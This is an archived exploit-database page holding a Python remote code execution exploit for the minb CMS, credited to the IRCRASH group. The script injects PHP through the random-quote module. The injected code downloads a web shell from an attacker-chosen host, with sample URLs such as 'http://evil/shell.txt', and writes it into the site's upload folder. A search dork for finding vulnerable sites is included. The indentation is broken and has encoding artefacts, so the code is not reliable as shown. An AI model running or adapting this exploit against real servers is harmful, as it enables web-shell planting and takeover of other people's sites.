AOH :: HP Unsorted M :: VA1241.HTM

minb Remote Code Execution Exploit



minb Remote Code Execution Exploit
minb Remote Code Execution Exploit



#!/usr/bin/python=0D
#####################################################################################=0D
####                     minb Remote Code Execution Exploit                      ####=0D
#####################################################################################=0D
#                                                                                   #=0D
#AUTHOR : IRCRASH (R3d.W0rm (Sina Yazdanmehr))                                      #=0D
#Discovered by : IRCRASH (R3d.W0rm (Sina Yazdanmehr))                               #=0D
#Our Site : Http://IRCRASH.COM #=0D 
#IRCRASH Team Members : Dr.Crash - R3d.w0rm (Sina Yazdanmehr)                       #=0D
#####################################################################################=0D
#                                                                                   #=0D
#Site : http://minb.sf.net #=0D 
#                                                                                   #=0D
#Download : http://switch.dl.sourceforge.net/sourceforge/minb/minb-0.1.0.tar.bz2 #=0D 
#                                                                                   #=0D
#DORK : Powered by minb                                                             #=0D
#                                                                                   #=0D
#####################################################################################=0D
#                                     [Note]                                        #=0D
#                                                                                   #=0D
#All php file in this cms have this bug ;)                                          #=0D
#                                                                                   #=0D
#####################################################################################=0D
# Site : Http://IRCRASH.COM #=0D 
###################################### TNX GOD ######################################=0D
import sys,urllib=0D
if len(sys.argv)<3 :=0D
    print "minb Remote code Execution Exploit"=0D
    print "Powered by : R3d.W0rm"=0D
print "www.IrCrash.com"=0D 
print "Usage : " + sys.argv[0] + " http://Target/path http://evil/shell.txt"=0D 
print "Ex. " + sys.argv[0] + " http://site.com/minb http://r3d.a20.ir/r.txt"=0D 
    exit()=0D
if 'http://' not in sys.argv[1] :=0D 
sys.argv[1]='http://' + sys.argv[1]=0D 
if 'http://' not in sys.argv[2] :=0D 
sys.argv[2]='http://' + sys.argv[2]=0D 
fp='/include/modules/top/1-random_quote.php?parse=r3d.w0rm'=0D
data=urllib.urlencode({'quotes_to_edit':'quotes_to_edit=";$s=fopen(\'' + sys.argv[2] + '\',r);while(!feof($s)){$shell.=fread($s,1024);};fclose($s);$fp=fopen(\'../../../upload/pictures/r3d.w0rm.php\',\'w+\');fwrite($fp,$shell);fclose($fp);/*'})=0D
urllib.urlopen(sys.argv[1] + fp,data)=0D
urllib.urlopen(sys.argv[1] + fp)=0D
test=urllib.urlopen(sys.argv[1] + '/upload/pictures/r3d.w0rm.php').read()=0D
if 'Not Found' not in test :=0D
    print "Shell Uploaded ."=0D
    print sys.argv[1] + '/upload/pictures/r3d.w0rm.php'=0D
exit()=0D

The entire AOH site is optimized to look best in Firefox® 3 on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH
We do not send spam. If you have received spam bearing an artofhacking.com email address, please forward it with full headers to abuse@artofhacking.com.